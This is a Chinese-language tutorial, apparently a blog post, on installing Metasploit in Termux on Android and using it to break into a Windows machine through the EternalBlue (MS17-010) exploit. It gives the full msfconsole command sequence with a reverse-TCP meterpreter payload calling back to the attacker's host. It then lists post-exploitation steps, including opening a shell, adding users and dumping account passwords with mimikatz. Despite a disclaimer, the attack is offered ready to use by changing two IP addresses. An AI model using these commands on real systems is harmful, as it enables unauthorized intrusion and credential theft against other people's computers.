在安卓系统安装运行Metasploit并对windows进行永恒之蓝攻击

注意！！！请勿用于非法用途！发生任何事都与本人无关不负任何责任！！！

简介

Metasploit是一款强大的渗透测试平台，其中包括了很多渗透测试利器，简称MSF。今天我就演示如何在手机上运行Metasploit并且实现"永恒之蓝"渗透内网windows主机！由于安卓平台的特殊性，要在Termux上部署MSF！

重要提醒

强烈建议用联通4g网络安装MSF，安装出错90%都是由于网络问题导致的！！！

步骤

点击下载并安装Termux.apk，第一次启动会下载系统，加载速度由网络决定。（如果不翻蔷下载会很慢很慢）

执行apt update && apt upgrade命令，Termux将会更新软件源并升级软件包。（遇到Do you want to continue? [Y/n]之类的提示就输入Y回车即可）

执行apt install curl proot命令，Termux将会安装curl。（遇到Do you want to continue? [Y/n]之类的提示就输入Y回车即可）

执行

curl -L https://Auxilus.github.io/metasploit.sh > metasploit.sh

命令，Termux将会下载MSF安装脚本。

执行

chmod +x metasploit.sh && ./metasploit.sh

命令，Termux将会自动安装MSF。（在此过程中会提示安装多个软件包，输入y回车即可，请耐心等待！我安装的时候整整花了半个小时！)

以上所有步骤完成之后，执行msfconsole命令即可启动metasploit神器！（启动速度有点慢，一般不会超过3分钟）——启动界面如下图：

实战演练

到这里Metasploit的安装就完成了！下面我演示一下攻击windows的"永恒之蓝"漏洞：

第一步，首先要找到一个开着445端口的靶机的ip，你可以用nmap扫描网段，也可以自己找，找ip的方法靠自己。这里我就示范一下攻击10.1.100.181这台windows，先启动msf，然后执行下面的命令：

use exploit/windows/smb/ms17_010_eternalblue

set rhost 10.1.100.181

set payload windows/x64/meterpreter/reverse_tcp

set lhost 10.13.175.191

set lport 5555

exploit

解释一下语句的作用

use exploit/windows/smb/ms17_010_eternalblue

就是使用ms17_010_eternalblue永恒之蓝模块

set rhost 10.1.100.181

就是设置靶机ip地址

set lhost 10.13.175.191

就是设置本机ip地址，你需要使用就修改两个ip地址就行了，其它不用修改。——入侵成功如下图：

现在这台windows就相当于被我拿下了，这时候执行screenshot可以获得该电脑的截图，执行shell可以在该电脑运行cmd命令，并可以添加用户，执行load mimikatz加载密码模块，使用命令wdigest获取电脑的账户密码，还有开启远程端口直接用自己的电脑控制那台windows等等等等，此处省略一万字。这里我就拿永恒之蓝作为例子，更多技术你们自己去谷歌学习吧！